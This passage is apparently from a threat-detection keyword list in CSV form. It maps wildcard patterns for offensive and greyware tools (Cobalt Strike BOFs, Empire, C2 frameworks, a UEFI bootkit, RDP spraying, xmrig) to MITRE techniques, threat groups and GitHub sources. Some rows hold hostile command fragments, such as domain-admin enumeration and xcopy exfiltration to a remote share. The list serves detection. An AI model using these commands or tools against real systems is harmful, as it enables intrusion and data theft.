- T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*WScriptBypassUAC*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1131","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*wsl kali-linux*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","wsl execution","N/A","N/A","N/A","N/A","N/A","N/A" +"*WSPCoerce.ex*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*WSPCoerce-main*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*wss://*.tunnels.api.visualstudio.com/api/v1/Connect/*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*WSUSpendu*","offensive_tool_keyword","WSUSpendu","At BlackHat USA 2015. the WSUSpect attack scenario has been released.Approximately at the same time. some french engineers have been wondering if it would be possible to use a compromised WSUS server to extend the compromise to its clients. similarly to this WSUSpect attack. After letting this topic rest for almost two years. we've been able. at Alsid and ANSSI. to demonstrate this attack.","T1563 - T1204 - T1210 - T1071","TA0001 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AlsidOfficial/WSUSpendu","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wsuxploit*","offensive_tool_keyword","wsuxploit","This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. It is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation. 'WSUSpect Compromising the Windows Enterprise via Windows Update","T1557.001 - T1557.002 - T1573 - T1210.001","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/pimps/wsuxploit","1","1","N/A","N/A","3","267","50","2022-11-25T10:04:15Z","2017-06-30T01:06:41Z" +"*wts_enum_remote_processes*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","104","12","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" +"*wumb0/rust_bof*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"*WwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkALgBuAGEAbQBlAAoA*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*www.exploit-db.com/download/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*www.ip-api.com*","greyware_tool_keyword","ip-api.com","get public ip address","T1016 - T1071.001","TA0005 - TA0002","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","1","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*www.kali.org/get-kali/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*www.securityfocus.com/archive/1/514379*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*www.vsecurity.com/download/tools/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*www.wfuzz.org*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wxfuzz.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wxfuzz.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*WypdIENhbid0IENvbm5lY3QgQWxpeXVuIEJ1Y2tldC4=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*WypdIFRoZSBCdWNrZXQgb3IgUmVmbGVjdGl2ZSBETEwgVVJJIGlzIEVtcHR5Lg==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*WytdIEluamVjdGVkIHRoZSA=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*-x *net group *Domain Admins* /domain*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*X32_ClSp_Tcp_Exe.exe*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*X64_ClSp_Tcp_Exe.exe*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*x64PELoader/*.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*x64win-DynamicNoNull-WinExec-PopCalc-Shellcode*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*x86_64-unknown-uefi*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*x86PELoader/*.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*x86PELoader/test_agent_dll*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*x86PELoader/test_agent_exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*x86PELoader/test_proxy_dll*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*x86PELoader/test_proxy_exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*x90skysn3k*","offensive_tool_keyword","Github Username","Github username known for password exploitation and offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/x90skysn3k","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*xato-net-10-million-usernames.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*X-C2-Beacon*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*xcopy /y /d *\msquic_schannel\msquic.dll*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","0","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" +"*xcopy c:\* \\*\c$*","greyware_tool_keyword","xcopy","command abused by attackers - exfiltraiton to remote host with xcopy","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Data Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*xforcered/CredBandit*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" +"*xforcered/Detect-Hooks*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/Detect-Hooks","1","1","N/A","10","10","91","6","2021-07-22T20:13:16Z","2021-07-23T16:10:37Z" +"*xforwardedfor.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*xFreed0m/RDPassSpray*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" +"*xfreerdp /v*SOCtest*AllLegitHere*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" +"*xfrm_poc*lucky0*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*xillwillx*","offensive_tool_keyword","Github Username","github repo username hosting red team tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/xillwillx","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*XiphosResearch*","offensive_tool_keyword","exploits","Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.","T1203 - T1068 - T1062 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/XiphosResearch/exploits","1","0","N/A","N/A","10","1433","606","2023-07-20T10:15:01Z","2015-03-05T11:15:07Z" +"*x-ishavocframework*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*xmendez/wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*XML-External-Entity-(XXE)-Payloads*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*xmrig-*-bionic-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-focal-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-freebsd-static-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-linux-static-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-linux-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 